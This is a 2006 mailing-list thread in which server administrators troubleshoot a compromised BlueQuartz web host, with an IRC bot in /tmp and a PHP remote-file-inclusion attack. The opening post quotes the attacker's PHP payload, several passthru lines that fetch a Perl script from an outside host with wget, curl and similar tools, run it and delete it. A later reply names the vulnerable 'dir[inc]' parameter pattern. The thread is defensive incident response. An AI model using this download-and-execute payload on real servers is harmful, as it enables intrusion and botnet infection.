Index: [Article Count Order] [Thread]

Date:  Tue, 12 Sep 2006 08:36:19 +0200
From:  =?ISO-8859-1?Q?Tom_M=FCller-Kortkamp?= <tmueko (at mark) kommunity.net>
Subject:  [coba-e:06848] Re: /TMP Directory
To:  coba-e (at mark) bluequartz.org
Message-Id:  <C7EAC357-F7F2-4E76-9B98-88BEB206F3A8 (at mark) kommunity.net>
In-Reply-To:  <4505E107.1060300 (at mark) planetcentral.net>
References:  <002701c6d450$c0c58480$6400a8c0 (at mark) YOUR4105E587B6> <02d601c6d583$ee2f57f0$0e00a8c0 (at mark) office.swiftinter.net> <4505E107.1060300 (at mark) planetcentral.net>
X-Mail-Count: 06848

as the owner is apache, you have to find it there.
I would start searching in the Users Homedirectories: There also  
often weak Userpasswords where the hacker upload the first routine  
and starts it via Browser...

Try this: "find /home/sites/*/users/*/web -exec grep matahati {} /dev/ 
null \;"

I found something like this here:
http://channels.dal.net/matahati/matahati.tar.gz
lokks like some irc-bot


Am 12.09.2006 um 00:19 schrieb paul:

> :o oh my god... have been trying for the last 2 days to work out  
> what was up with my server, and thats it....
>
> I seem to have the following in my /tmp folder :
>
>
> total 44
> drwxrwxrwt   5 root   root   4096 Sep 11 23:11 .
> drwxr-xr-x  25 root   root   4096 Sep 11 22:10 ..
> -rw-------   1 root   root     49 Sep 11 23:11 ClamAVBusy.lock
> drwxrwxrwt   2 root   root   4096 Sep 11 22:10 .ICE-unix
> drwxr-xr-x  10 apache apache 4096 Sep 11 22:09 .LiveZone
> drwxr-xr-x   9 apache apache 4096 Sep 11 23:06 matahati
> -rw-------   1 root   root   4697 Sep  9  
> 21:35 .spamassassin4037sdcX9Htmp
> -r--r--r--   1 root   root    275 Sep 11 23:01 yum.check-update
> -rw-r--r--   1 root   root   1367 Sep 11 05:31 yum.update
>
> Now the Clam i can understand. The yum and the spam assasin also.  
> The rest shouldnt be there and need to be removed.
>
> Please PLEASE could someone tell me how i can rid myself of this!
>
> Now i know why i'm getting perl scripts hanging, using 98% Cpu time  
> and the box load hits over 50 and things stop working!
>
> Please help... It's only a home box with a couple of sites on it,  
> but i want to get it back!!
>
> Thanks
> Paul
>
>
> Paul Wilson - Swift Internet wrote:
>> It is also likely that your PHP script has a severe vulnerability  
>> in it
>>
>> I think the attack was in two parts - did you see the php script  
>> being used in the following way (check your access_log)
>>
>> ****php?dir[inc]=http:// "URL location of attack script"
>>
>> This script would then be run to pull in the v6 script that you  
>> saw in action.
>>
>>
>> The "php?dir[inc]" vulnerability became known at the tail end of  
>> August, so these attacks are going to become more widespread.
>>
>> And yes, one of our servers was hit this way.
>>
>>
>> Regards
>>
>> Paul
>>
>>
>> ----- Original Message ----- From: "Darrell D. Mobley"  
>> <dmobley (at mark) uhostme.net>
>> To: <coba-e (at mark) bluequartz.org>
>> Sent: Saturday, September 09, 2006 9:44 PM
>> Subject: [coba-e:06808] /TMP Directory
>>
>>
>>> There was some discussion here lately about the security fix that  
>>> stopped
>>> programs from running in /TMP.  Is this configured by default if  
>>> you have
>>> your BQ Yum updated?  I got a DDOS today where the users were  
>>> trying to run
>>> the following program via PHP:
>>>
>>> <?
>>> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/ 
>>> v6.txt;perl
>>> v6.txt;rm -f v6*');
>>> passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/ 
>>> v6.txt;perl
>>> v6.txt;rm -f v6*');
>>> passthru('cd /tmp;lwp-download
>>> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/ 
>>> oki/v6.txt
>>>> v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>>>> v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>>>> v6.txt;perl v6.txt;rm -f v6*');
>>> ?>
>>>
>>> The v6.txt is a Perl script that installs some IRC software and  
>>> monitors IRC
>>> on open ports.  I do not think the script was successful in  
>>> running, but I
>>> just want to make sure the /TMP security is enabled where files  
>>> can't be run
>>> there.  While I don't think the DDOS attack was successful in  
>>> running the
>>> script, it was successful in shutting down the serer due to MySQL  
>>> becoming
>>> overwhelmed.  Server load was up to 156!
>>>
>>> Any suggestions would be appreciated.
>>>
>>>
>>
>>
>
>
> -- 
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.
>
>

-- 
kommunity GmbH & Co.KG
Tom MÍler-Kortkamp
Netzwerke & Internet
Goseriede 4
D-30159 Hannover

Phone +49 (0)5 11 - 80 72 58 0
Fax +49 (0)5 11 - 80 72 58 10
http://www.kommunity.net